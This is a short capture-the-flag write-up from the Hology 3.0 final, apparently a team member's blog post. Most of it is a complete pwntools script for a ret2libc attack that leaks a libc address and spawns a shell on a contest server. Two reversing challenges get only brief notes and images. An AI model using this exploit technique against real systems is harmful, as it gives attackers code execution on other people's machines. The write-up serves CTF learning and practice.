Writeup Hology 3.0 CTF Final
Published on 26 Nov 2020
Writeup Hology 3.0 CTF Final
my team glut0r is qualifed to the final round this year, and this is my write up for some challenge
Pwn
- Hello
Rev
- n0t so long
- phone
Hello | pwn
this is a simple ret2libc attack leak libc function, calculate to `system()` and `/bin/sh` my exploit:#!/usr/bin/env python2
import sys
from pwn import *
context.update(arch="amd64", endian="little", os="linux", log_level="debug",
terminal=["tmux", "split-window", "-v", "-p 85"],)
LOCAL, REMOTE = False, False
TARGET=os.path.realpath("/home/tripoloski/code/ctf/hology3-final/pwn/hello/hallo")
elf = ELF(TARGET)
libc= ELF("./libc.so")
# libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")
def attach(r):
if LOCAL:
bkps = []
gdb.attach(r, '\n'.join(["break %s"%(x,) for x in bkps]))
return
# 0x4f3d5 execve("/bin/sh", rsp+0x40, environ)
# constraints:
# rsp & 0xf == 0
# rcx == NULL
# 0x4f432 execve("/bin/sh", rsp+0x40, environ)
# constraints:
# [rsp+0x40] == NULL
# 0x10a41c execve("/bin/sh", rsp+0x70, environ)
# constraints:
# [rsp+0x70] == NULL
def exploit(r):
attach(r)
puts_got = elf.got['puts']
pop_rdi = 0x0000000000400733
puts = 0x000000000400520
main = 0x0000000000400637
ret = 0x0000000000400506
p = "A" * 71
p += ">"
p += p64(pop_rdi)
p += p64(puts_got)
p += p64(puts)
p += p64(main)
r.sendlineafter(":",p)
r.recvuntil(">")
leak = u64(r.recv().split()[1].ljust(8, "\x00"))
log.info("leak: " + hex(leak))
base = leak - libc.sym['puts']
syst = libc.sym['system'] + base
binsh = libc.search("/bin/sh").next()
one = 0x10a41c + base
info(hex(syst))
p = "A" * 72
# p += p64(pop_rdi)
# p += p64(binsh)
# p += p64(syst)
# p += p64(syst)
p += p64(one)
r.sendline(p)
r.interactive()
return
if __name__ == "__main__":
if len(sys.argv)==2 and sys.argv[1]=="remote":
REMOTE = True
r = remote("95.111.192.17", 31337)
else:
LOCAL = True
r = process([TARGET,])
exploit(r)
sys.exit(0)
n0t so long | Rev
the flag is already in the binary file, so we can just collect all the string using idadata:image/s3,"s3://crabby-images/b42dd/b42dd927388d3b1e9a51572ffba6059aaa48ec05" alt=""
Phone | Rev
we can solve this challenge with the same approaches to the previous challenge, first i found this functiondata:image/s3,"s3://crabby-images/2b712/2b712147db5b7129b620708fe859edc84a41c888" alt=""
data:image/s3,"s3://crabby-images/49b0d/49b0d1927e51b99184a8e9c84334e22c1082229e" alt=""